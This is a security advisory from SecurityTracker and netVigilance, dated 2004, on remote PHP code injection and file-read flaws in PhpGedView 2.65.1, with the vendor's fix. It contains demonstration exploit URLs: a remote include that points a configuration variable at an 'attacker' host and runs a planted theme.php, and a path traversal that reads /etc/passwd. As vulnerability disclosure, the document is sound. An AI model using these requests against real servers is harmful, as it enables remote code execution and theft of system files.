PhpGedView Include File Holes in 'conf' Files Let Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1008892
|
|
CVE Reference: CAN-2004-0127
, CAN-2004-0128
(Links to External Site)
|
Updated: Feb 4 2004
|
Original Entry Date: Jan 30 2004
|
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: netVigilance
|
Version(s): 2.65.1 and prior versions
|
Description: Cedric Cochin of netVigilance reported several include file vulnerabilities in PhpGedView. A remote user can execute arbitrary PHP
code and operating system commands on the target system. A remote authenticated user with 'admin' privileges can view files on
the target system.
It is reported that the several scripts (those ending in '_conf.php') do not properly validate user-supplied input in the $PGV_BASE_DIRECTORY
variable. A remote user can supply a specially crafted URL to cause remote PHP code, including operating system commands, to be
included by and executed on the target system with the privileges of the target web service [CVE: CAN-2004-0128].
A demonstration
exploit URL is provided that will cause the '[GED_File]_conf.php' script located at the 'attacker' site to be included and executed
on the target system:
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
The
system is only affected when PHP register_globals is On, the report said.
It is also reported that a remote authenticated user
with 'admin' privileges can view arbitrary files on the system with the privileges of the web service due to an input validation
flaw in the 'gedcom_config' parameter of the 'editconfig_gedcom.php' script [CVE: CAN-2004-0127].
A demonstration exploit URL
is provided:
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target
web service.
A remote authenticated user with 'admin' privileges can view arbitrary files on the target system with the privileges
of the target web service.
|
Solution: The vendor has released a fixed version (2.65.2), available at:
http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517
|
Vendor URL: phpgedview.sourceforge.net/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Cedric Cochin <cco@netvigilance.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 30 Jan 2004 00:27:33 +0100
From: Cedric Cochin <cco@netvigilance.com>
Subject: PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
################################################################################
Summary :
phpGedView is an open source system for online viewing Gedcom information
(family tree and genology information). Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product. They enable a malicious user
to access arbitrary files or execute commands on the server.
################################################################################
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* phpGedView version 2.65.1 and prior
Release Date :
January 30, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/pass
wd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
- -- HTTP Request --
Code impacted : editconfig_gedcom.php
61:if (empty($gedcom_config)) {
62: if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"
];
63: else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);
The both GET/POST requets will work evenif PHP register_globals is Off.
-------------------------------------------
II - PHP Injection
(HIGH Risk no authentication needed)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&
THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform
a http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.
The attacker has to create on his web site a directory call themes/standard, and
a file theme.php
For example: theme.php = <?php print "<?php phpinfo();?>" ;?>
and the request, will execute the phpinfo() command on the vulnerable target.
################################################################################
Vendor Status :
The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- -->
http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=14151
7
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< cco@netvigilance.com >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFAGZbZA9/8vqmWoYQRAmVrAJ9rd9L6WkO5FV9ufaMYj5mhk0uMXwCePwxS
+hdjG8/IGk+yoZje7W1I110=
=Gfdz
-----END PGP SIGNATURE-----
|
|
